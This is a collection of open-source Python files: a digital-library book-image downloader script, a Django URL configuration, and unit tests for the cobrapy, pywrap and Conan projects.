continue
print(f"Downloading page #{page:08d}")
get_binary(output_filename, url)
@opster.command()
def hathi(
id=("", "", "Id of the book to be downloaded (e. g. `wu.89005529961`)")
):
"""
Downloads book from http://www.hathitrust.org/
"""
output_folder = make_output_folder("hathi", id)
meta_url = f"https://babel.hathitrust.org/cgi/imgsrv/meta?id={id}"
metadata = get_json(meta_url)
total_pages = metadata["total_items"]
print(f"Going to download {total_pages} pages to {output_folder}")
	for page in range(1, total_pages + 1):
url = f"https://babel.hathitrust.org/cgi/imgsrv/image?id={id};seq={page};width=1000000"
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Downloading page {page} to {output_filename}")
get_binary(output_filename, url)
@opster.command()
def vwml(
id=("", "", "Id of the book to be downloaded (e. g. `Wilson1808`)")
):
"""
Downloads book from https://www.vwml.org/topics/historic-dance-and-tune-books
"""
main_url = f"https://www.vwml.org/topics/historic-dance-and-tune-books/{id}"
main_markup = get_text(main_url)
soup = bs4.BeautifulSoup(main_markup, "html.parser")
output_folder = make_output_folder("vwml", id)
for page, thumbnail in enumerate(soup.find_all("img", attrs={"class": "image_thumb"})):
thumbnail_url = thumbnail.attrs["src"]
#IT'S MAGIC!
full_url = thumbnail_url.replace("thumbnails", "web")
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
print(f"Saving {full_url} to {output_filename}")
try:
get_binary(output_filename, full_url, verify=False)
except ValueError:
#VWML is known to have missing pages listed in this table.
#Ignoring such pages
pass
@opster.command()
def onb(
id=("", "", "Id of the book to be downloaded (e. g. `ABO_+Z178189508`)")
):
"""
Downloads book from http://onb.ac.at/
"""
# First, normalizing id
id = id.replace('/', '_')
if id.startswith("ABO"):
flavour = "OnbViewer"
elif id.startswith("DTL"):
flavour = "RepViewer"
else:
raise RuntimeError(f"Can not determine flavour for {id}")
# Second, obtaining JSESSIONID cookie value
viewer_url = f"http://digital.onb.ac.at/{flavour}/viewer.faces?doc={id}"
viewer_response = requests.get(viewer_url)
cookies = viewer_response.cookies
metadata_url = f"http://digital.onb.ac.at/{flavour}/service/viewer/imageData?doc={id}&from=1&to=1000"
metadata = get_json(metadata_url, cookies=cookies)
output_folder = make_output_folder("onb", id)
image_data = metadata["imageData"]
print(f"Going to download {len(image_data)} images")
for image in image_data:
query_args = image["queryArgs"]
image_id = image["imageID"]
image_url = f"http://digital.onb.ac.at/{flavour}/image?{query_args}&s=1.0&q=100"
output_filename = make_output_filename(output_folder, image_id, extension=None)
if os.path.isfile(output_filename):
print(f"Skip downloading existing image {image_id}")
continue
print(f"Downloading {image_id}")
get_binary(output_filename, image_url, cookies=cookies)
@opster.command()
def staatsBerlin(
id=("", "", "Id of the book to be downloaded (e. g. `PPN86902910X`)")
):
"""
Downloads book from http://digital.staatsbibliothek-berlin.de/
"""
output_folder = make_output_folder("staatsBerlin", id)
page = 1
while True:
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.isfile(output_filename):
print(f"Skipping existing page {page}")
else:
try:
image_url = f"http://ngcs.staatsbibliothek-berlin.de/?action=metsImage&metsFile={id}&divID=PHYS_{page:04d}"
#WARN:
# it looks like there is no normal way
# to get the number of pages in the book via http request
get_binary(output_filename, image_url)
except ValueError:
print(f"No more images left. Last page was {page - 1:04d}")
break
page += 1
@opster.command()
def polona(
id=("", "", "Base64-encoded id of the book to be downloaded (e. g. `Nzg4NDk0MzY`, can be found in permalink)")
):
"""
Downloads book from https://polona.pl
"""
entity_url = f"https://polona.pl/api/entities/{id}"
entity_metadata = get_json(entity_url)
output_folder = make_output_folder("polona", id)
for page, page_metadata in enumerate(entity_metadata["scans"]):
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
continue
found = False
		for image_metadata in page_metadata["resources"]:
			if image_metadata["mime"] == "image/jpeg":
				get_binary(output_filename, image_metadata["url"])
				found = True
				break
		if not found:
raise Exception(f"JPEG file was not found in image_metadata for page {page}")
@opster.command()
def haab(
id=("", "", "Id of the book to be downloaded (e. g. `1286758696_1822000000/EPN_798582804`)")
):
"""
Downloads book from https://haab-digital.klassik-stiftung.de/
"""
def make_url(page):
return f"https://haab-digital.klassik-stiftung.de/viewer/rest/image/{id}_{page:04d}.tif/full/10000,10000/0/default.jpg"
output_folder = make_output_folder("haab", id)
page = 0
	# HAAB server returns 403 for non-existing pages.
	# First, probe forward to find the number of the first existing page.
while True:
page_url = make_url(page)
head_response = requests.head(page_url)
if head_response.status_code == 200:
print(f"Found starting page {page:04d}")
break
page += 1
exception_count = 0
while True:
page_url = make_url(page)
output_filename = make_output_filename(output_folder, page, extension="jpg")
if os.path.exists(output_filename):
print(f"Skip downloading existing page #{page:08d}")
page += 1
continue
		try:
			print(f"Downloading page #{page:08d}")
			get_binary(output_filename, page_url)
			page += 1
			#a successful download resets the counter, so only consecutive failures abort
			exception_count = 0
except ValueError as ex:
page += 1
#WARN:
# Certain pages can return 403 even in the middle of the book.
# Skipping certain number of such pages.
exception_count += 1
if exception_count < 10:
print(f"Got ValueError while getting page {page:08d}: {ex}")
continue
else:
print(f"Got exception while getting page {page:08d}: {ex}. Exception limit was reached, downloader will exit now.")
break
if __name__ == "__main__":
opster.dispatch()
| gpl-3.0 | 1,744,960,985,823,110,000 | 31.074672 | 137 | 0.693922 | false |
bczmufrn/frequencia | frequencia/urls.py | 1 | 2221 | """frequencia URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
    1. Add an import: from my_app import views
    2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
    1. Add an import: from other_app.views import Home
    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.urls import include, path
    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from django.conf import settings
from django.contrib import admin
from django.conf.urls import include
from django.conf.urls.static import static
urlpatterns = [
path('', include('frequencia.core.urls', namespace='core')),
path('registro/', include('frequencia.registro.urls', namespace='registro')),
path('vinculos', include('frequencia.vinculos.urls', namespace='vinculos')),
path('calendario/', include('frequencia.calendario.urls', namespace='calendario')),
path('justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
path('relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
path('conta/', include('frequencia.accounts.urls', namespace='accounts')),
path('admin/', admin.site.urls),
]
# urlpatterns = [
# url(r'^', include('frequencia.core.urls', namespace='core')),
# url(r'^registro/', include('frequencia.registro.urls', namespace='registro')),
# url(r'^vinculos/', include('frequencia.vinculos.urls', namespace='vinculos')),
# url(r'^calendario/', include('frequencia.calendario.urls', namespace='calendario')),
# url(r'^justificativas/', include('frequencia.justificativas.urls', namespace='justificativas')),
# url(r'^relatorios/', include('frequencia.relatorios.urls', namespace='relatorios')),
# url(r'^admin/', admin.site.urls),
# url(r'^conta/', include('frequencia.accounts.urls', namespace='accounts')),
# ]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | mit | 7,764,757,986,167,539,000 | 47.304348 | 99 | 0.70869 | false |
opencobra/cobrapy | src/cobra/test/test_flux_analysis/test_deletion.py | 1 | 11849 | # -*- coding: utf-8 -*-
"""Test functionalities of reaction and gene deletions."""
from __future__ import absolute_import
import math
import numpy as np
import pytest
from pandas import Series
from cobra.flux_analysis.deletion import (
double_gene_deletion,
double_reaction_deletion,
single_gene_deletion,
single_reaction_deletion,
)
from cobra.flux_analysis.room import add_room
# Single gene deletion FBA
def test_single_gene_deletion_fba_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using FBA."""
model.solver = all_solvers
benchmark(single_gene_deletion, model)
def test_single_gene_deletion_fba(model, all_solvers):
"""Test single gene deletion using FBA."""
# expected knockouts for textbook model
model.solver = all_solvers
growth_dict = {
"b0008": 0.87,
"b0114": 0.80,
"b0116": 0.78,
"b2276": 0.21,
"b1779": 0.00,
}
result = single_gene_deletion(
model=model, gene_list=list(growth_dict), method="fba", processes=1
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
# Singe gene deletion MOMA
def test_single_gene_deletion_moma_benchmark(model, benchmark, qp_solvers):
"""Benchmark single gene deletion using MOMA."""
model.solver = qp_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion, model=model, gene_list=genes, method="moma", processes=1
)
def test_single_gene_deletion_moma(model, qp_solvers):
"""Test single gene deletion using MOMA."""
model.solver = qp_solvers
# expected knockouts for textbook model
growth_dict = {
"b0008": 0.87,
"b0114": 0.71,
"b0116": 0.56,
"b2276": 0.11,
"b1779": 0.00,
}
result = single_gene_deletion(
model=model, gene_list=list(growth_dict), method="moma", processes=1
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
def test_single_gene_deletion_moma_reference(model, qp_solvers):
"""Test single gene deletion using MOMA (reference solution)."""
model.solver = qp_solvers
# expected knockouts for textbook model
growth_dict = {
"b0008": 0.87,
"b0114": 0.71,
"b0116": 0.56,
"b2276": 0.11,
"b1779": 0.00,
}
sol = model.optimize()
result = single_gene_deletion(
model=model,
gene_list=list(growth_dict),
method="moma",
solution=sol,
processes=1,
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
# Single gene deletion linear MOMA
def test_single_gene_deletion_linear_moma_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using linear MOMA."""
model.solver = all_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion,
model=model,
gene_list=genes,
method="linear moma",
processes=1,
)
def test_single_gene_deletion_linear_moma(model, all_solvers):
"""Test single gene deletion using linear MOMA (reference solution)."""
model.solver = all_solvers
# expected knockouts for textbook model
growth_dict = {
"b0008": 0.87,
"b0114": 0.76,
"b0116": 0.65,
"b2276": 0.08,
"b1779": 0.00,
}
sol = model.optimize()
result = single_gene_deletion(
model=model,
gene_list=list(growth_dict),
method="linear moma",
solution=sol,
processes=1,
)
for gene, value in growth_dict.items():
assert np.isclose(result.knockout[gene].growth, value, atol=1e-02)
# Single gene deletion ROOM
def test_single_gene_deletion_room_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using ROOM."""
if all_solvers == "glpk":
pytest.skip("GLPK is too slow to run ROOM.")
model.solver = all_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion, model=model, gene_list=genes, method="room", processes=1
)
# Single gene deletion linear ROOM
def test_single_gene_deletion_linear_room_benchmark(model, benchmark, all_solvers):
"""Benchmark single gene deletion using linear ROOM."""
model.solver = all_solvers
genes = ["b0008", "b0114", "b2276", "b1779"]
benchmark(
single_gene_deletion,
model=model,
gene_list=genes,
method="linear room",
processes=1,
)
# Single reaction deletion
def test_single_reaction_deletion_benchmark(model, benchmark, all_solvers):
"""Benchmark single reaction deletion."""
model.solver = all_solvers
benchmark(single_reaction_deletion, model=model, processes=1)
def test_single_reaction_deletion(model, all_solvers):
"""Test single reaction deletion."""
model.solver = all_solvers
expected_results = {
"FBA": 0.70404,
"FBP": 0.87392,
"CS": 0,
"FUM": 0.81430,
"GAPD": 0,
"GLUDy": 0.85139,
}
result = single_reaction_deletion(
model=model, reaction_list=list(expected_results), processes=1
)
for reaction, value in expected_results.items():
assert np.isclose(result.knockout[reaction].growth, value, atol=1e-05)
# Single reaction deletion ROOM
def test_single_reaction_deletion_room(room_model, room_solution, all_solvers):
"""Test single reaction deletion using ROOM."""
room_model.solver = all_solvers
expected = Series(
{
"v1": 10.0,
"v2": 5.0,
"v3": 0.0,
"v4": 5.0,
"v5": 5.0,
"v6": 0.0,
"b1": 10.0,
"b2": 5.0,
"b3": 5.0,
},
index=["v1", "v2", "v3", "v4", "v5", "v6", "b1", "b2", "b3"],
)
with room_model:
room_model.reactions.v6.knock_out()
add_room(room_model, solution=room_solution, delta=0.0, epsilon=0.0)
room_sol = room_model.optimize()
assert np.allclose(room_sol.fluxes, expected)
# Single reaction deletion linear ROOM
def test_single_reaction_deletion_linear_room(room_model, room_solution, all_solvers):
"""Test single reaction deletion using linear ROOM."""
room_model.solver = all_solvers
expected = Series(
{
"v1": 10.0,
"v2": 5.0,
"v3": 0.0,
"v4": 5.0,
"v5": 5.0,
"v6": 0.0,
"b1": 10.0,
"b2": 5.0,
"b3": 5.0,
},
index=["v1", "v2", "v3", "v4", "v5", "v6", "b1", "b2", "b3"],
)
with room_model:
room_model.reactions.v6.knock_out()
add_room(
room_model, solution=room_solution, delta=0.0, epsilon=0.0, linear=True
)
linear_room_sol = room_model.optimize()
assert np.allclose(linear_room_sol.fluxes, expected)
# Double gene deletion
def test_double_gene_deletion_benchmark(large_model, benchmark):
"""Benchmark double gene deletion."""
genes = ["b0726", "b4025", "b0724", "b0720", "b2935", "b2935", "b1276", "b1241"]
benchmark(double_gene_deletion, large_model, gene_list1=genes, processes=1)
def test_double_gene_deletion(model):
"""Test double gene deletion."""
genes = ["b0726", "b4025", "b0724", "b0720", "b2935", "b2935", "b1276", "b1241"]
growth_dict = {
"b0720": {
"b0720": 0.0,
"b0724": 0.0,
"b0726": 0.0,
"b1241": 0.0,
"b1276": 0.0,
"b2935": 0.0,
"b4025": 0.0,
},
"b0724": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.814,
"b1241": 0.814,
"b1276": 0.814,
"b2935": 0.814,
"b4025": 0.739,
},
"b0726": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.858,
"b1276": 0.858,
"b2935": 0.858,
"b4025": 0.857,
},
"b1241": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.874,
"b1276": 0.874,
"b2935": 0.874,
"b4025": 0.863,
},
"b1276": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.874,
"b1276": 0.874,
"b2935": 0.874,
"b4025": 0.863,
},
"b2935": {
"b0720": 0.0,
"b0724": 0.814,
"b0726": 0.858,
"b1241": 0.874,
"b1276": 0.874,
"b2935": 0.874,
"b4025": 0.863,
},
"b4025": {
"b0720": 0.0,
"b0724": 0.739,
"b0726": 0.857,
"b1241": 0.863,
"b1276": 0.863,
"b2935": 0.863,
"b4025": 0.863,
},
}
solution = double_gene_deletion(model, gene_list1=genes, processes=3)
solution_one_process = double_gene_deletion(model, gene_list1=genes, processes=1)
for rxn_a, sub in growth_dict.items():
for rxn_b, growth in sub.items():
sol = solution.knockout[{rxn_a, rxn_b}]
sol_one = solution_one_process.knockout[{rxn_a, rxn_b}]
assert np.isclose(sol.growth, growth, atol=1e-3)
assert np.isclose(sol_one.growth, growth, atol=1e-3)
# Double reaction deletion
def test_double_reaction_deletion_benchmark(large_model, benchmark):
"""Benchmark double reaction deletion."""
reactions = large_model.reactions[1::100]
benchmark(double_reaction_deletion, large_model, reaction_list1=reactions)
def test_double_reaction_deletion(model):
"""Test double reaction deletion."""
reactions = ["FBA", "ATPS4r", "ENO", "FRUpts2"]
growth_dict = {
"FBA": {"ATPS4r": 0.135, "ENO": float("nan"), "FRUpts2": 0.704},
"ATPS4r": {"ENO": float("nan"), "FRUpts2": 0.374},
"ENO": {"FRUpts2": 0.0},
}
solution = double_reaction_deletion(model, reaction_list1=reactions, processes=3)
solution_one_process = double_reaction_deletion(
model, reaction_list1=reactions, processes=1
)
for (rxn_a, sub) in growth_dict.items():
for rxn_b, growth in sub.items():
sol = solution.knockout[{rxn_a, rxn_b}]
sol_one = solution_one_process.knockout[{rxn_a, rxn_b}]
if math.isnan(growth):
assert math.isnan(sol.growth)
assert math.isnan(sol_one.growth)
else:
assert np.isclose(sol.growth, growth, atol=1e-3)
assert np.isclose(sol_one.growth, growth, atol=1e-3)
def test_deletion_accessor(small_model):
"""Test the DataFrame accessor."""
single = single_reaction_deletion(small_model, small_model.reactions[0:10])
double = double_reaction_deletion(small_model, small_model.reactions[0:10])
rxn1 = small_model.reactions[0]
rxn2 = small_model.reactions[1]
with pytest.raises(ValueError):
single.knockout[1]
with pytest.raises(ValueError):
single.knockout[{"a": 1}]
assert single.knockout[rxn1].ids.iloc[0] == {rxn1.id}
assert double.knockout[{rxn1, rxn2}].ids.iloc[0] == {rxn1.id, rxn2.id}
assert all(single.knockout[rxn1.id] == single.knockout[rxn1])
assert all(double.knockout[{rxn1.id, rxn2.id}] == double.knockout[{rxn1, rxn2}])
assert single.knockout[rxn1, rxn2].shape == (2, 3)
assert double.knockout[rxn1, rxn2].shape == (2, 3)
assert double.knockout[{rxn1, rxn2}].shape == (1, 3)
assert double.knockout[{rxn1}, {rxn2}].shape == (2, 3)
| gpl-2.0 | -1,685,886,892,921,720,000 | 30.018325 | 86 | 0.571103 | false |
AlexanderFabisch/cythonwrapper | test/test_type_conversions.py | 1 | 4159 | import numpy as np
from pywrap.testing import cython_extension_from
from nose.tools import assert_equal, assert_raises
def test_bool_in_bool_out():
with cython_extension_from("boolinboolout.hpp"):
from boolinboolout import A
a = A()
b = False
assert_equal(not b, a.neg(b))
def test_double_in_double_out():
with cython_extension_from("doubleindoubleout.hpp"):
from doubleindoubleout import A
a = A()
d = 3.213
assert_equal(d + 2.0, a.plus2(d))
def test_complex_arg():
with cython_extension_from("complexarg.hpp"):
from complexarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_map():
with cython_extension_from("map.hpp"):
from map import lookup
m = {"test": 0}
assert_equal(lookup(m), 0)
def test_vector():
with cython_extension_from("vector.hpp"):
from vector import A
a = A()
v = np.array([2.0, 1.0, 3.0])
n = a.norm(v)
assert_equal(n, 14.0)
def test_string_in_string_out():
with cython_extension_from("stringinstringout.hpp"):
from stringinstringout import A
a = A()
s = "This is a sentence"
assert_equal(s + ".", a.end(s))
def test_string_vector():
with cython_extension_from("stringvector.hpp"):
from stringvector import A
a = A()
substrings = ["AB", "CD", "EF"]
res = a.concat(substrings)
assert_equal(res, "ABCDEF")
def test_complex_ptr_arg():
with cython_extension_from("complexptrarg.hpp"):
from complexptrarg import A, B
a = A()
b = B(a)
assert_equal(b.get_string(), "test")
def test_factory():
with cython_extension_from("factory.hpp"):
from factory import AFactory
factory = AFactory()
a = factory.make()
assert_equal(5, a.get())
def test_primitive_pointers():
with cython_extension_from("primitivepointers.hpp"):
from primitivepointers import fun1
assert_equal(fun1(5), 6)
def test_cstring():
with cython_extension_from("cstring.hpp"):
from cstring import length, helloworld
assert_equal(length("test"), 4)
assert_equal(helloworld(), "hello world")
def test_fixed_length_array():
with cython_extension_from("fixedarray.hpp"):
from fixedarray import to_string
assert_equal(to_string([1, 2, 3, 4, 5]), "[1, 2, 3, 4, 5]")
assert_raises(ValueError, to_string, [1, 2, 3, 4])
assert_raises(TypeError, to_string, [1, 2, 3, 4, "a"])
def test_missing_default_ctor():
with cython_extension_from("missingdefaultctor.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingdefaultctor")
def test_missing_assignment():
with cython_extension_from("missingassignmentop.hpp", hide_errors=True):
assert_raises(ImportError, __import__, "missingassignmentop")
def test_exceptions():
# A list of convertible exceptions can be found in the Cython docs:
# http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html#exceptions
with cython_extension_from("throwexception.hpp"):
from throwexception import (throw_bad_alloc, throw_bad_cast,
throw_domain_error, throw_invalid_argument,
throw_ios_base_failure,
throw_out_of_range, throw_overflow_error,
throw_range_error, throw_underflow_error,
throw_other)
assert_raises(MemoryError, throw_bad_alloc)
assert_raises(TypeError, throw_bad_cast)
assert_raises(ValueError, throw_domain_error)
assert_raises(ValueError, throw_invalid_argument)
assert_raises(IOError, throw_ios_base_failure)
assert_raises(IndexError, throw_out_of_range)
assert_raises(OverflowError, throw_overflow_error)
assert_raises(ArithmeticError, throw_range_error)
assert_raises(ArithmeticError, throw_underflow_error)
assert_raises(RuntimeError, throw_other)
| bsd-3-clause | -8,130,951,337,650,966,000 | 31.24031 | 79 | 0.613369 | false |
kotoroshinoto/TCGA_MAF_Analysis | gooch_maf_tools/util/MAFcounters.py | 1 | 4909 | import os
import sys
from ..formats import MAF
__author__ = 'mgooch'
class FeatureCounter:
def __init__(self):
self.counts = dict()
self.name = None
def count(self, entry: MAF.Entry):
return 0
def __appendcount__(self, keystring):
if keystring is None:
return
if keystring in self.counts:
self.counts[keystring] += 1
else:
self.counts[keystring] = 1
def __countif__(self, keystring, condition):
if condition:
self.__appendcount__(keystring)
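	#Subclasses derive a key string from each MAF entry in count() and tally it
	#via __appendcount__; __str__ then renders the tallies as TSV.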
def __str__(self):
str_val = ""
for key in sorted(self.counts.keys()):
str_val += "%s\t%s\n" % (key, self.counts[key])
return str_val
	def write_file(self, path, prefix=None):
		if self.name is not None and len(self.name) > 0:
			if prefix is not None and len(prefix) > 0:
				out_file_name = os.path.join(path, "%s_%s.txt" % (prefix, self.name))
				#$ofname=$path.'/'.$prefix.'_'.$self->{name}.".txt";
			else:
				out_file_name = os.path.join(path, "%s.txt" % self.name)
				#$ofname=$path.'/'.$self->{name}.".txt";
			# print "$ofname\n";
			out_file_handler = open(out_file_name, mode='w')
			out_file_handler.write("%s" % self)
			out_file_handler.close()
		else:
			print("writeFile used on counter with no name", file=sys.stderr)
			sys.exit(-1)
class GeneMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Hugo_Symbol'])
class LocMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
#count according to GENE_CHROM_START_END
self.__appendcount__("%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position']))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class SampMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Tumor_Sample_Barcode'])
# self.__appendcount__(entry.Tumor_Sample_UUID)
class MutTypeCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__(mut_type)
class MutTypeAtLocCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__("%s|%s|%s|%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position'], entry.data['Variant_Type'], entry.data['Variant_Classification'], mut_type))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tMUT_TYPE\tVARIANT_TYPE\tVARIANT_CLASS\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class MutTypePerSampCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
combin_str = "%s_|_%s" % (entry.data['Tumor_Sample_Barcode'], mut_type)
self.__appendcount__(combin_str)
@staticmethod
def prep_nuc_key_list():
nuc_characters = list("ACTG")
combo_keys = list()
for nuc1 in nuc_characters:
for nuc2 in nuc_characters:
if nuc1 != nuc2:
combo_keys.append(("%s_%s" % (nuc1, nuc2)))
combo_keys.append(("-_%s" % nuc1))
combo_keys.append(("%s_-" % nuc1))
combo_keys.append("MNC")
return combo_keys
@staticmethod
def initialize_sample_dictionary(sample_list):
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
grid_dict = dict()
for sample in sample_list:
if sample not in grid_dict:
grid_dict[sample] = dict()
for key in nuc_keys:
grid_dict[sample][key] = 0
return grid_dict
def get_grid_dict(self):
samples = list()
split_entries = list()
for key in sorted(self.counts.keys()):
key_split = list(key.split('_|_'))
key_split.append(self.counts[key])
split_entries.append(key_split)
if key_split[0] not in samples:
samples.append(key_split[0])
grid_dict = MutTypePerSampCounter.initialize_sample_dictionary(samples)
for entry in split_entries:
grid_dict[entry[0]][entry[1]] = entry[2]
return grid_dict
def __str__(self):
str_val = ""
grid_dict = self.get_grid_dict()
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
first_line = "sample_ID"
for nuc_pair in nuc_keys:
first_line += "\t" + nuc_pair
first_line += "\n"
for sample in grid_dict:
entry_str = str(sample)
for nuc_pair in nuc_keys:
entry_str += "\t" + str(grid_dict[sample][nuc_pair])
entry_str += "\n"
str_val += entry_str
# str_val += "%s\t%s\t%s\n" % (key_split[0], key_split[1], key_split[2])
return first_line + str_val
| unlicense | 4,157,340,140,636,658,700 | 30.06962 | 232 | 0.657975 | false |
conan-io/conan | conans/test/integration/command/download/download_test.py | 1 | 9237 | import os
import unittest
from collections import OrderedDict
from conans.model.ref import ConanFileReference
from conans.test.utils.tools import (TestClient, TestServer, NO_SETTINGS_PACKAGE_ID, TurboTestClient,
GenConanfile)
from conans.util.files import load
class DownloadTest(unittest.TestCase):
def test_download_recipe(self):
client = TurboTestClient(default_server_user={"lasote": "pass"})
# Test download of the recipe only
conanfile = str(GenConanfile().with_name("pkg").with_version("0.1"))
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref, conanfile)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable --recipe")
self.assertIn("Downloading conanfile.py", client.out)
self.assertNotIn("Downloading conan_package.tgz", client.out)
export = client.cache.package_layout(ref).export()
self.assertTrue(os.path.exists(os.path.join(export, "conanfile.py")))
self.assertEqual(conanfile, load(os.path.join(export, "conanfile.py")))
conan = client.cache.package_layout(ref).base_folder()
self.assertFalse(os.path.exists(os.path.join(conan, "package")))
def test_download_with_sources(self):
server = TestServer()
servers = OrderedDict()
servers["default"] = server
servers["other"] = TestServer()
client = TestClient(servers=servers, users={"default": [("lasote", "mypass")],
"other": [("lasote", "mypass")]})
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
name = "pkg"
version = "0.1"
exports_sources = "*"
"""
client.save({"conanfile.py": conanfile,
"file.h": "myfile.h",
"otherfile.cpp": "C++code"})
client.run("export . lasote/stable")
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.run("upload pkg/0.1@lasote/stable")
client.run("remove pkg/0.1@lasote/stable -f")
client.run("download pkg/0.1@lasote/stable")
self.assertIn("Downloading conan_sources.tgz", client.out)
source = client.cache.package_layout(ref).export_sources()
self.assertEqual("myfile.h", load(os.path.join(source, "file.h")))
self.assertEqual("C++code", load(os.path.join(source, "otherfile.cpp")))
def test_download_reference_without_packages(self):
client = TestClient(default_server_user=True)
client.save({"conanfile.py": GenConanfile().with_name("pkg").with_version("0.1")})
client.run("export . user/stable")
client.run("upload pkg/0.1@user/stable")
client.run("remove pkg/0.1@user/stable -f")
client.run("download pkg/0.1@user/stable")
# Check 'No remote binary packages found' warning
self.assertIn("WARN: No remote binary packages found in remote", client.out)
# Check at least conanfile.py is downloaded
ref = ConanFileReference.loads("pkg/0.1@user/stable")
self.assertTrue(os.path.exists(client.cache.package_layout(ref).conanfile()))
def test_download_reference_with_packages(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
conanfile = """from conans import ConanFile
class Pkg(ConanFile):
name = "pkg"
version = "0.1"
settings = "os"
"""
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref, conanfile)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable")
package_layout = client.cache.package_layout(ref)
package_folder = os.path.join(package_layout.packages(),
os.listdir(package_layout.packages())[0])
# Check not 'No remote binary packages found' warning
self.assertNotIn("WARN: No remote binary packages found in remote", client.out)
# Check at conanfile.py is downloaded
self.assertTrue(os.path.exists(package_layout.conanfile()))
# Check package folder created
self.assertTrue(os.path.exists(package_folder))
def test_download_wrong_id(self):
client = TurboTestClient(servers={"default": TestServer()},
users={"default": [("lasote", "mypass")]})
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.export(ref)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable:wrong", assert_error=True)
self.assertIn("ERROR: Binary package not found: 'pkg/0.1@lasote/stable:wrong'",
client.out)
def test_download_pattern(self):
client = TestClient()
client.run("download pkg/*@user/channel", assert_error=True)
self.assertIn("Provide a valid full reference without wildcards", client.out)
def test_download_full_reference(self):
server = TestServer()
servers = {"default": server}
client = TurboTestClient(servers=servers, users={"default": [("lasote", "mypass")]})
ref = ConanFileReference.loads("pkg/0.1@lasote/stable")
client.create(ref)
client.upload_all(ref)
client.remove_all()
client.run("download pkg/0.1@lasote/stable:{}".format(NO_SETTINGS_PACKAGE_ID))
package_layout = client.cache.package_layout(ref)
package_folder = os.path.join(package_layout.packages(),
os.listdir(package_layout.packages())[0])
# Check not 'No remote binary packages found' warning
self.assertNotIn("WARN: No remote binary packages found in remote", client.out)
# Check at conanfile.py is downloaded
self.assertTrue(os.path.exists(package_layout.conanfile()))
# Check package folder created
self.assertTrue(os.path.exists(package_folder))
def test_download_with_full_reference_and_p(self):
client = TestClient()
client.run("download pkg/0.1@user/channel:{package_id} -p {package_id}".
format(package_id="dupqipa4tog2ju3pncpnrzbim1fgd09g"),
assert_error=True)
self.assertIn("Use a full package reference (preferred) or the `--package`"
" command argument, but not both.", client.out)
def test_download_with_package_and_recipe_args(self):
client = TestClient()
client.run("download eigen/3.3.4@conan/stable --recipe --package fake_id",
assert_error=True)
self.assertIn("ERROR: recipe parameter cannot be used together with package", client.out)
